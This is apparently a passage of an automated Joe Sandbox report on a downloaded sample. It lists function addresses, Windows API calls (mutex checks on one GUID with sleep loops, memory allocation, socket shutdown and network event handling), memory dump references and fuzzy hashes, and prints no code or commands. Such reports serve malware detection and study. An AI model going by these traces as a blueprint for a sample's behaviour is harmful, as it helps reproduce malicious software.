                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 00310190
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003101A3
                                                                                                            • Sleep.KERNEL32(00000064), ref: 003101AB
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 00310184
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpenSleep
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2969294566-3746470483
                                                                                                            • Opcode ID: 72d2f13fe5a0fcf391f91158bbd0fefc3c5371d0c1e7d563d09c751604129690
                                                                                                            • Instruction ID: 202d1131effe3c65d8a6f46c43beb345bafc88cde69bd64d3dbbf9a2804f930c
                                                                                                            • Opcode Fuzzy Hash: 72d2f13fe5a0fcf391f91158bbd0fefc3c5371d0c1e7d563d09c751604129690
                                                                                                            • Instruction Fuzzy Hash: B4E0BF74955305EBD73E9BA0CE0DBE97A74AB08745F204139A506751D0CBF98AC0CA62
                                                                                                            Function 00310289 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 00310264
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00310277
                                                                                                            • Sleep.KERNEL32(00000064), ref: 0031027F
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00310290
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 00310258
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2551712853-3746470483
                                                                                                            • Opcode ID: e901395d8e9c985d0fe3a05658b79110f4d21e0ce5f9dda6cb2452c92d2b7000
                                                                                                            • Instruction ID: 9dd0b2af464940125bc343bdf1465e3e55e0ecf4c48b4601d3e6800aa3abd7a6
                                                                                                            • Opcode Fuzzy Hash: e901395d8e9c985d0fe3a05658b79110f4d21e0ce5f9dda6cb2452c92d2b7000
                                                                                                            • Instruction Fuzzy Hash: D9E04630A40300EBE76E9BE0C88CBCD3A79BB0C301F285818F106B11C0C7F884C1CA24
                                                                                                            Function 00310368 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 00310343
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00310356
                                                                                                            • Sleep.KERNEL32(00000064), ref: 0031035E
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0031036F
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 00310337
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2551712853-3746470483
                                                                                                            • Opcode ID: debe8663723fd0464e7444c325019f195c54c64aab54968fb17d15da81f64d62
                                                                                                            • Instruction ID: 488ce4b49c403c302f1a081a70677590ac2c4c534ce70a02ab5feef03b0c1651
                                                                                                            • Opcode Fuzzy Hash: debe8663723fd0464e7444c325019f195c54c64aab54968fb17d15da81f64d62
                                                                                                            • Instruction Fuzzy Hash: 15E0BF34940304EBE76F5B91D95D79D7675BB0C701F108418F522651E0CBF444C4DF01
                                                                                                            Function 003103D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}), ref: 003103B0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003103C3
                                                                                                            • Sleep.KERNEL32(00000064), ref: 003103CB
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 003103DC
                                                                                                            Strings
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 003103A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CloseHandleMutexOpen
                                                                                                            • String ID: {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                                                                                                            • API String ID: 2551712853-3746470483
                                                                                                            • Opcode ID: 78602f41e20c77d655654187b42cb2894a2dc5610d4afcad4e97ee71c8f02b3f
                                                                                                            • Instruction ID: 5c58317d622c9829d8d7c1a52d95990b588963212fef853a943cbe1082bc9f3f
                                                                                                            • Opcode Fuzzy Hash: 78602f41e20c77d655654187b42cb2894a2dc5610d4afcad4e97ee71c8f02b3f
                                                                                                            • Instruction Fuzzy Hash: AAE0B634A44314DBE72E9BA0CD4DB9E7A79BB08705F148828F552A55D4CBF948C5CB01
                                                                                                            Function 0031CC90 Relevance: 6.3, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00009004), ref: 0031CC9D
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0031CCB7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CCEB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD02
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD0C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3098330729-0
                                                                                                            • Opcode ID: e9fc183e28e18d4458a5def7834781249d5c243206f0ed4990802c86b9dfa5ca
                                                                                                            • Instruction ID: 79b18990b65be0ac6e5fc5bf050cfd8dcf6af3dcd03b2582e294a2269ddecdc4
                                                                                                            • Opcode Fuzzy Hash: e9fc183e28e18d4458a5def7834781249d5c243206f0ed4990802c86b9dfa5ca
                                                                                                            • Instruction Fuzzy Hash: 4411CC75910308FFDB0ADFA8E989B9E7BB9FB4C301F108598F905A7250D6349A44DF54
                                                                                                            Function 0031E1A0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0031EBC0: LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0031EC09
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0031E3F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocFreeLocalVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3333721195-0
                                                                                                            • Opcode ID: 8bd307a9b38c5b85456f17132e8a52bd6d8ff148ef5e6e9a610a22087e04736f
                                                                                                            • Instruction ID: 00330d7afea5f4770e45def9a3cad1d4185266bde5497278e4dc454d653984cb
                                                                                                            • Opcode Fuzzy Hash: 8bd307a9b38c5b85456f17132e8a52bd6d8ff148ef5e6e9a610a22087e04736f
                                                                                                            • Instruction Fuzzy Hash: 7391B074E00209DFCB19CF98C884AEDBBB6FF88304F248559E816AB345D735A992CF50
                                                                                                            Function 0032C243 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0032C277
                                                                                                            • __isleadbyte_l.LIBCMT ref: 0032C2AA
                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 0032C2DB
                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 0032C349
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                            • String ID:
                                                                                                            • API String ID: 3058430110-0
                                                                                                            • Opcode ID: ac608b9c5e819997940b4692ddfeafac0f1d5271f1a8f9a7530ba9b4e6ed3aaf
                                                                                                            • Instruction ID: 19caa2ef1e269d3e1472afdffd3ae20119797932a7a0d701681df9da119024b3
                                                                                                            • Opcode Fuzzy Hash: ac608b9c5e819997940b4692ddfeafac0f1d5271f1a8f9a7530ba9b4e6ed3aaf
                                                                                                            • Instruction Fuzzy Hash: 4231E531A24365EFDF22DFA4E8809BD7BA4FF01310F259969E4A59B191DB30DD40DB50
                                                                                                            Function 00321DB0 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00321E06
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00321E2A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321E4C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321E6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2857295742-0
                                                                                                            • Opcode ID: 828740abbcdc2bd48f9e0fab50541f78da24f936f286395a2494c3ba112dcb8c
                                                                                                            • Instruction ID: ef6310302ec84da005e74e8c1b51cb18add67ad8d0b3a15051b47aaaf2c3118d
                                                                                                            • Opcode Fuzzy Hash: 828740abbcdc2bd48f9e0fab50541f78da24f936f286395a2494c3ba112dcb8c
                                                                                                            • Instruction Fuzzy Hash: 462135315001049BCB1ECF58E6D9B7DBBB5FB61305F5642AED406AF6E1C7309986CB50
                                                                                                            Function 0032F653 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                            • String ID:
                                                                                                            • API String ID: 3016257755-0
                                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                            • Instruction ID: f330fe63fa06c2a601f3f8f80533939c7e7843ea458fc5782e8606f98275be0a
                                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                            • Instruction Fuzzy Hash: E911093240015ABFCF235E84EC42CEE3F76FB19394B598525FA1859531D636C9B1AF81
                                                                                                            Function 0031C850 Relevance: 6.0, APIs: 4, Instructions: 46synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0031C887
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C898
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C8A5
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C8BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocalObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2545295749-0
                                                                                                            • Opcode ID: 8e69c74bc69be313f11f96b9ff3da163a89553dfc9119e461b6b0ae06a223cf7
                                                                                                            • Instruction ID: f7b7b32247aef0e603231933b3317e626c564072a5e7af7d263a8f26a838c93e
                                                                                                            • Opcode Fuzzy Hash: 8e69c74bc69be313f11f96b9ff3da163a89553dfc9119e461b6b0ae06a223cf7
                                                                                                            • Instruction Fuzzy Hash: 0A110C79A10208EFCB09DF94C988A9EBBB9BF48300F208588E9055B350D734EE85DF50
                                                                                                            Function 00321928 Relevance: 6.0, APIs: 4, Instructions: 45synchronizationnetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 003215F6
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0032163E
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321953
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321977
                                                                                                            • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 003219A8
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 003219D1
                                                                                                            • closesocket.WS2_32(?), ref: 003219E5
                                                                                                            • CloseHandle.KERNEL32(?), ref: 003219F6
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D0F
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D23
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321D52
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D7D
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D8A
                                                                                                            • LocalFree.KERNEL32(?), ref: 00321D9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                                                            • String ID:
                                                                                                            • API String ID: 3044467104-0
                                                                                                            • Opcode ID: 574c165f25d984b0d2131cf348d29847d2aa2fd049e4b96d33f1761896555c88
                                                                                                            • Instruction ID: 26fff9eb01f3ca17af96f7b53e72ddfd58e00815b8c079b01cdde24b11b6217a
                                                                                                            • Opcode Fuzzy Hash: 574c165f25d984b0d2131cf348d29847d2aa2fd049e4b96d33f1761896555c88
                                                                                                            • Instruction Fuzzy Hash: 8C213A78604228CFCB65CF44EA88BE97775BFA8309F2040D9D5CA66290CBB85EC0CF51
                                                                                                            Function 00321613 Relevance: 6.0, APIs: 4, Instructions: 45synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0032163E
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321678
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 003218CE
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D0F
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D23
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321D52
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D7D
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D8A
                                                                                                            • LocalFree.KERNEL32(?), ref: 00321D9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                                                            • String ID:
                                                                                                            • API String ID: 785092289-0
